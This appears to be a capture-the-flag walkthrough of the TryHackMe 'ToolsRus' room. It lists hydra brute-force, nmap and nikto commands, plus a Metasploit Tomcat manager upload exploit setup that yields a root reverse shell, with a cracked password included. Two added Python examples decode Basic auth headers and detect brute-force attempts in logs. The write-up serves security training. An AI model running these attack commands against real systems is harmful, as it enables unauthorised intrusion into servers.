The Dutch Hacker
ToolsRus Tryhackme

ToolsRus on Tryhackme

This is the write-up for the room ToolsRus on Tryhackme; it is part of the Web Fundamentals path.

Connect with the VPN or use the AttackBox on the Tryhackme site to reach the Tryhackme lab environment.

TASKS ToolsRus

Task 1

Start up the machine attached to this room.

1.1 What directory can you find, that begins with a “g”?

We can use dirbuster to enumerate directories. Open up a terminal and type in the following command: dirbuster

Fill in the information as seen in the screenshot below, but change the IP to that of the target.

[Screenshot: ToolsRus tryhackme]

Press start

I always like to see the tree view. The scan is still running, but we can already see the answer to this question.

[Screenshot: ToolsRus tryhackme]
Answer: guidelines

1.2 Whose name can you find from this directory?

Navigating to this directory in Firefox gives us the name.

[Screenshot: ToolsRus tryhackme]

1.3 What directory has basic authentication?

The scan is still running, but we can see another directory called protected.

[Screenshot: ToolsRus tryhackme]
Answer: protected

1.4 What is bob’s password to the protected part of the website?

We know the username is bob, but we do not know his password.

First we intercept the request with Burp, using username bob and password password1234.

We see that the authentication is HTTP Basic: the username and password are sent Base64-encoded in the Authorization header.
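As an added illustration (this code is not part of the original write-up), the snippet below decodes a captured Authorization header the way Burp shows it, and contrasts that with how a server should store and check the password: Base64 is an encoding, not encryption, so anyone who sees the request sees the credentials in the clear unless TLS protects the connection. The captured header value is constructed to match the bob / password1234 test request above; the PBKDF2 storage format is an assumption for the example, not anything the room's server does.

```python
import base64
import binascii
import hashlib
import hmac
import os

# Constructed header, as a proxy such as Burp would show it for bob:password1234.
CAPTURED_HEADER = "Basic Ym9iOnBhc3N3b3JkMTIzNA=="


def parse_basic_auth(header_value):
    """Decode an 'Authorization: Basic <token>' value into (username, password).

    Returns None when the value is not well-formed Basic authentication.
    """
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        decoded = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    # RFC 7617: the user-id cannot contain ':'; everything after the first ':' is the password.
    user, sep, password = decoded.partition(":")
    if not sep:
        return None
    return user, password


def hash_password(password, salt=None, iterations=200_000):
    """Derive a salted PBKDF2-HMAC-SHA256 hash for storage (assumed storage format)."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Check a submitted password against a stored hash using a constant-time compare."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
        )
    except ValueError:
        return False
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    creds = parse_basic_auth(CAPTURED_HEADER)
    print("decoded credentials from the captured header:", creds)
    stored = hash_password("password1234")
    print("stored form on the server side:", stored)
    print("correct password verifies:", verify_password("password1234", stored))
    print("wrong password verifies:", verify_password("password1235", stored))
```

Run it directly to see the decoded pair and the stored hash; the point of the second half is that even if the server side stores only a salted hash, the wire format of Basic authentication still exposes the plaintext password to anyone who can read the request.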

Options for hydra:

[Screenshot: hydra password]

Type in the command

hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.84.151 http-get /protected

-f stops the scan as soon as a password is found. It is basic authentication, so we use http-get against the directory protected.

Here is a nice guide to help you further with hydra and basic authentication:

Defeating HTTP Basic Auth with Hydra – Code Zen (tylerrockwell.github.io)

[Screenshot: hydra scan]
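From the defender's side, a brute-force run like the one above leaves a very recognisable trail: a burst of 401 responses for the protected path from one client, followed by a 200 once a password works. As an added example (not part of the original write-up), the script below parses Apache combined-format access log lines and raises an alert when one client exceeds a failure threshold inside a time window, and a second alert if that client then succeeds. The log lines are constructed for the example; the path, threshold and window are parameters you would tune for your own server.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in Apache "combined" log format; not taken from the room's machine.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:00 +0000] "GET /guidelines/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /protected/ HTTP/1.1" 401 456 "-" "Mozilla/4.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /protected/ HTTP/1.1" 401 456 "-" "Mozilla/4.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /protected/ HTTP/1.1" 401 456 "-" "Mozilla/4.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /protected/ HTTP/1.1" 401 456 "-" "Mozilla/4.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /protected/ HTTP/1.1" 401 456 "-" "Mozilla/4.0"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /protected/ HTTP/1.1" 401 456 "-" "Mozilla/4.0"
10.0.0.9 - bob [01/Jan/2024:10:00:07 +0000] "GET /protected/ HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
10.0.0.7 - - [01/Jan/2024:10:00:08 +0000] "GET /protected/ HTTP/1.1" 401 456 "-" "Mozilla/5.0"
10.0.0.7 - bob [01/Jan/2024:10:00:09 +0000] "GET /protected/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# ip, ident, authenticated user, timestamp, request line, status, size (the rest is ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_basic_auth_bruteforce(lines, protected_prefix="/protected",
                                 threshold=5, window=timedelta(seconds=60)):
    """Return alerts for clients that hit `threshold` 401s on the protected path
    within `window`, plus a follow-up alert if a flagged client later gets a 2xx."""
    failures = defaultdict(deque)   # ip -> timestamps of recent 401s
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(protected_prefix):
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] == 401:
            recent = failures[ip]
            recent.append(ts)
            while recent and ts - recent[0] > window:   # slide the window forward
                recent.popleft()
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"type": "bruteforce", "ip": ip,
                               "failures": len(recent), "at": ts})
        elif 200 <= rec["status"] < 300 and ip in flagged:
            # A success after a burst of failures usually means a guessed password.
            alerts.append({"type": "success_after_bruteforce", "ip": ip,
                           "user": rec["user"], "at": ts})
    return alerts


def run_sample():
    """Run the detector over the constructed log and return its alerts."""
    return detect_basic_auth_bruteforce(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

On the sample log, 10.0.0.9 is flagged at its fifth 401 and again when its request for /protected/ succeeds as bob, while 10.0.0.7 (one typo, then success) is not flagged. In practice you would feed it the live access log and pair the alert with a rate limit or a lockout on the protected realm.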

1.5 What other port that serves a web service is open on the machine?

Type in the following command to find all open ports and their services:

nmap -sC -sV -T4 <MACHINE_IP>

[Screenshot: nmap scan the right way]

Answer: 1234

1.6 Going to the service running on that port, what is the name and version of the software? Answer format: Full_name_of_service/Version

We do not need to browse to the site; the answer is in our nmap scan.

Answer: Apache Tomcat/7.0.88

1.7 Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above. How many documentation files did Nikto identify?

Options for Nikto:

[Screenshot: nikto scan]

Use the following command with nikto (replace the password with the one you found):

nikto -host 10.10.84.151 -root /manager/html -port 1234 -id bob:PASSWORDYOUHAVEFOUND

Answer: 5

1.8 What is the server version (run the scan against port 80)?

This is also in the nmap scan we ran earlier.

Answer: apache/2.4.18

1.9 What version of Apache-Coyote is this service using?

This is also in the nmap scan we ran earlier.

Answer: 1.1

1.10 Use Metasploit to exploit the service and get a shell on the system. What user did you get a shell as?

We know it is Apache-Coyote 1.1; a bit of research on Google leads us to this one:

Apache Tomcat Manager Authenticated Upload Code Execution (rapid7.com)

Open msfconsole in a terminal.

Now we can load and configure the exploit in Metasploit by typing in the following:

use exploit/multi/http/tomcat_mgr_upload
set target 0
set httppassword bubbles
set httpusername bob
set rhost 10.10.84.151
set rport 1234
set lhost tun0
run
[Screenshot: ToolsRus tryhackme]

Type in shell to drop into a system shell, then type in whoami.

Answer: root

1.11 What text is in the file /root/flag.txt?

Type in cat /root/flag.txt to read the flag.
